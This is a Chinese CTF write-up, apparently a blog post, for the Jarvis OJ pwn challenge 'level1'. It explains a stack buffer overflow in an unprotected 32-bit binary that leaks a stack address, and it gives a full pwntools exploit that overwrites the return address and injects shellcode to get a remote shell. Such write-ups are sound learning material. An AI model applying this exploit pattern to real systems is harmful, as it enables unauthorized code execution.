zoukankan      html  css  js  c++  java
  • Jarvis Oj Pwn 学习笔记level1

    32位pwn题目(听说出题人送shellcode?)

    呈上链接:

    https://files.cnblogs.com/files/Magpie/level1.rar

    nc pwn2.jarvisoj.com 9877

    先看一下保护:

    竟然什么都没开......所以...

    扔进IDA找到溢出点就可以开始食用了:

    选中的函数即为存在溢出点的函数:

    出题人可以说......是把通往shell的钥匙贴在脸上了。。

    特意烹制了一条printf告诉你栈的具体内存地址,shellcode了解一哈...

    直接上exp吧:

     1 from pwn import *
     2 context(arch = 'i386', os = 'linux')
     3 r = remote('pwn2.jarvisoj.com', 9877)
     4 # EXPLOIT CODE GOES HERE
     5 ech=r.recvline()
     6 print ech+'##############'
     7 shellcode=asm(shellcraft.sh())
     8 retaddr=int(input('pls ipt=echaddr+0x88+0x08:'))
     9 print p32(retaddr)
    10 payload='A'*140+p32(retaddr)+shellcode
    11 r.send(payload)
    12 r.interactive()

    写这段的时候由于初学pwntools,还不太熟练。。

    所以,,代码很丑就不说了~

  • 相关阅读:
    ISpout源码解析
    storm完全分布式部署
    sqoop工具
    sqoop安装步骤
    HBASE常用配置
    linux命令无法使用:命令行输入:set>lll cat lll echo $PATH
    BubbleSort
    QuickSortWithRec
    面试题
    Nginx配置安装
  • 原文地址:https://www.cnblogs.com/Magpie/p/9117062.html
Copyright © 2011-2022 走看看